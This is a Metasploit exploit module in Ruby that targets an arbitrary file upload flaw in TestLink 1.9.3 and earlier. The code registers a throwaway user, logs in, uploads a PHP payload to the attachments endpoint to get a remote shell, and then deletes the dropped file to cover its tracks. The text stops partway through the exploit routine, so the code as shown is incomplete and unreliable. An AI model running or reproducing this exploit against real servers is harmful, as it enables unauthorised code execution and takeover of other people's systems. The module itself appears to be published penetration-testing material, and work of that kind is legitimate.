## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "TestLink v1.9.3 Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability in TestLink version 1.9.3 or prior. This application has an upload feature that allows any authenticated user to upload arbitrary files to the '/upload_area/nodes_hierarchy/' directory with a randomized file name. The file name can be retrieved from the database using SQL injection. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brendan Coles ' # Discovery and exploit ], 'References' => [ [ 'OSVDB', '85446' ], [ 'EDB', '20500' ], [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Aug 13 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/testlink-1.9.3/']) ], self.class) end def check base = target_uri.path base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" # retrieve software version from login page begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, "login.php") }) return Exploit::CheckCode::Unknown if res.nil? if res if res.code == 200 if res.body =~ /

Company logo\s+
TestLink 1\.9\.3/ return Exploit::CheckCode::Appears end end end return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project Home<\/a>
/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout vprint_error("#{peer} - Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def upload(base, fname, file) boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}" data_post = "--#{boundary}\r\n" data_post << "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\"#{fname}\"\r\n" data_post << "Content-Type: text/php\r\n" data_post << "\r\n" data_post << file data_post << "\r\n" data_post << "--#{boundary}\r\n" data_post << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" data_post << "\r\n1048576\r\n" data_post << "--#{boundary}\r\n" res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}lib/attachments/attachmentupload.php", 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data_post, 'cookie' => datastore['COOKIE'], }) return res end def register(base, user, pass) res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}firstLogin.php", 'data' => "login=#{user}&password=#{pass}&password2=#{pass}&firstName=#{user}&lastName=#{user}&email=#{user}%40#{user}.tld&doEditUser=Add+User+Data", }) return res end def login(base, user, pass) res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}login.php", 'data' => "reqURI=&destination=&tl_login=#{user}&tl_password=#{pass}&login_submit=Login", 'cookie' => datastore['COOKIE'], }) return res end def on_new_session(client) print_warning("Deleting #{@token}.php") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("#{@token}.php") else client.shell_command_token("rm #{@token}.php") end end def exploit base = normalize_uri(target_uri.path) base << '/' if base[-1, 1] != '/' datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";" # register an account user = rand_text_alphanumeric(rand(10)+6) print_status("#{peer} - Registering user (#{user})") res = register(base, user, user) if res and res.code == 200 and res.body =~ /\\\<\/head\>\\